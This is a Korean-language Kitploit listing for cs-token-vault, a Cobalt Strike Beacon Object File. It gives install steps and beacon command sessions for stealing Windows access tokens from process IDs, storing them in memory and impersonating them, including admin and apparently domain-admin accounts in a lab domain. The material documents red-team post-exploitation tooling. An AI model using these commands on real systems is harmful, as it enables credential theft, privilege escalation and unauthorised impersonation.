Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cs-token-vault — 인메모리 토큰 금고 BOF for Cobalt Strike | Kitploit
도구/GitHubGitHub/henkru/cs-token-vault
Authentication & AuthorizationPenetration Testing FrameworksPrivilege EscalationPost-ExploitationRed Teaming
GitHubhenkru/cs-token-vault

cs-token-vault

인메모리 토큰 금고 BOF for Cobalt Strike

저장소 보기
1512684년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Cobalt Strike용 Token Vault BOF

이 Beacon Object File(BOF)은 도난/복제된 Windows 액세스 토큰을 메모리 내 저장소에 보관하며 다음을 수행할 수 있게 합니다:

  • 이미 도난된 토큰을 다시 복제하지 않고 즉시 교체/재사용합니다.
  • 사용자가 로그아웃하는 경우에 대비해 토큰을 나중에 사용할 수 있도록 저장합니다.

설치

  1. 최신 릴리스 빌드를 다운로드하거나 make all로 빌드합니다.
  2. Cobalt Strike 클라이언트에 token-vault.cna aggressor 스크립트를 로드합니다.

사용법

root@kitploit:~
beacon> help token-vault
Available Commands:
    Create a new token vault:    token-vault create
    Steal and store tokens:      token-vault steal <comma separated list of PIDs> [vault-id]
    Use the stored token:        token-vault use <token-id> [vault-id]
    Show the stored tokens:      token-vault show [vault-id]
    Remove the stored token:     token-vault remove <token-id> [vault-id]
    Remove all tokens:           token-vault remove-all [vault-id]
    Set the default token vault: token-vault set <vault-id>

볼트 생성

token-vault create 명령은 비콘의 힙에서 빈 볼트를 할당합니다. 출력에는 볼트의 메모리 주소(일명 볼트 ID)가 포함되며, 다른 token-vault 명령에서 볼트를 지정하는 데 사용됩니다.

root@kitploit:~
beacon> token-vault create
[*] Token Vault - create (@henkru)
[+] host called home, sent: 2991 bytes
[+] received output:
token vault created: 0000000000C31610

또한 특정 볼트 ID를 기본 볼트로 설정할 수 있습니다. token-vault 명령에 볼트 ID가 포함되지 않은 경우 기본 볼트가 사용됩니다.

root@kitploit:~
beacon> token-vault set 0000000000C31610

중요한 점은 구성된 기본 볼트는 Cobalt Strike 클라이언트 내부에 존재하며 클라이언트 간에 공유되지 않는다는 것입니다.

토큰 도난

token-vault steal 명령은 지정된 프로세스의 토큰을 복제하여 볼트에 저장합니다.

root@kitploit:~
beacon> token-vault steal 6600,2608,5248
[*] Token Vault - steal (@henkru)
[+] host called home, sent: 3009 bytes
[+] received output:
6600: WINLAB\limited
[+] received output:
2608: WINLAB\limited2
[+] received output:
5248: WINLAB\admin

저장된 토큰 표시

root@kitploit:~
beacon> token-vault show
[*] Token Vault - show (@henkru)
[+] host called home, sent: 2999 bytes
[+] received output:
5248: WINLAB\admin
2608: WINLAB\limited2
6600: WINLAB\limited

토큰 사용

token-vault use 명령은 볼트의 토큰을 가장합니다. 토큰이 존재하지 않으면 해당 토큰을 도난하여 볼트에 저장합니다.

root@kitploit:~
beacon> token-vault use 2608
[*] Token Vault - use (@henkru)
[+] host called home, sent: 3001 bytes
[+] Impersonated WINLAB\limited
root@kitploit:~
beacon> token-vault use 6384
[*] Token Vault - use (@henkru)
[+] host called home, sent: 3001 bytes
[-] token of 6384 not in the vault; try to get it.
[+] received output:
6384: WINLAB\da
[+] Impersonated WINLAB\da

토큰 제거

token-vault remove 명령은 볼트에 저장된 토큰을 제거합니다.

root@kitploit:~
beacon> token-vault remove 6600
[*] Token Vault - remove (@henkru)
[+] host called home, sent: 3001 bytes
[+] received output:
removed: 6600

또한 token-vault remove-all 명령은 모든 토큰을 한 번에 제거합니다.

도구 다운로드